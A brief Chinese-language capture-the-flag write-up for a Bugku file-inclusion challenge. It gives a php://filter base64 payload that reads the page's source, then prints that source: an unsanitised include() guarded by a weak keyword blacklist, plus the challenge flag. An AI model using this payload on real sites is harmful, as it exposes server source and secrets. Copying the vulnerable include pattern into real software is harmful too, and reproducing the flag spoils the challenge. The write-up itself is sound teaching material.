Bugku-12.文件包含-php伪协议
文件包含
利用php伪协议读取
谈一谈php://filter的妙用 | 离别歌 (leavesongs.com)
?file=php://filter/read=convert.base64-encode/resource=index.php
base64解码
<html>
<title>Bugku-web</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{61d755938dc1bb9f1a14c0eb7e017f85}
?>
</html>